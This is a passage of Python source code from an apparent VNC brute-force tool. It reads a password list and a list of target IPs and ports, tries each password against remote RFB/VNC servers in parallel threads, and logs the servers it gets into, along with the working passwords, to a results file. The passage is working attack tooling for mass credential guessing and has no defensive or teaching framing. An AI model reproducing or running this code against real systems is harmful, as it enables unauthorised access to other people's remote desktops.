				self.output_kill = True

				self.results.close()
				stdout.write("\n\nDONE! Check \"output/results.txt\" or type \"show results\"!\n\n")
			else:
				stdout.write("\n\tThere are no scanned ips.\n")
		else:
			stdout.write("\n\tThere are no passwords.\n")

	def brute_thread(self, server, password):
		try:
			rfb = RFBProtocol(server[0], password, server[1], CONFIG['brute_timeout'])
			rfb.connect()
			rfb.close()
			lock.acquire()
			if rfb.RFB:
				if rfb.connected:
					self.servers.pop(self.servers.index(server))
					if rfb.null:
						password = "null"
					self.results.write("%s:%i-%s-[%s]\n" % (str(server[0]), int(server[1]), password, rfb.name))
					stdout.flush()
					stdout.write("\r[*] %s:%i - %s              \n\n" % (str(server[0]), int(server[1]), password))
			lock.release()
		except KeyboardInterrupt:
			return
		except:
			pass
		semaphore.release()

	def output_thread(self):
		while not self.output_kill:
			try:
				if self.current_password != None:
					stdout.flush()
					stdout.write("\r Trying \"%s\" on %i servers    " % (self.current_password, len(self.servers)))
					time.sleep(0.2)
			except:
				pass

	def get_passwords(self):
		if not Files.file_empty(FILES['passwords']):
			for line in open(FILES['passwords'], 'r').readlines():
				if line.strip != "":
					self.passwords.append(line.strip())
		else:
			self.passwords = False

	def get_servers(self):
		if not Files.file_empty(FILES['ips']):
			for line in open(FILES['ips'], 'r').readlines():
				if line.count(":") == 1:
					line = line.strip().split(":")
					if NetTools.is_ip(line[0]) and Misc.is_int(line[1]):
						self.servers.append([line[0], int(line[1])])
				elif NetTools.is_ip(line.strip()):
					self.servers.append([line.strip(), CONFIG['scan_port']])
		else:
			self.servers = False

class MainEngine:

	def __init__(self):
		global Files, NetTools, Deploy, Display, Interface, ScanEngine, BruteEngine, Misc
		Files = FilesHandler()
		NetTools = NetTools()
		Deploy = Deploy()
		Misc = MiscFunctions()
		Display = Display()
		ScanEngine = ScanEngine()
		BruteEngine = BruteEngine()
		Interface = Interface()

	def Start(self):
		self.load_config()
		Display.clearscreen()
		Interface.Start()

	def load_config(self):
		global CONFIG
		CONFIG = pickle.load(open(FILES['config']))

if __name__ == "__main__":
	try:
		MainEngine = MainEngine()
		MainEngine.Start()
	except KeyboardInterrupt:
		if CONFIG['auto_save'] == "true":
			Misc.save_config()
		sys.exit("\n\n\t...Exiting...\n")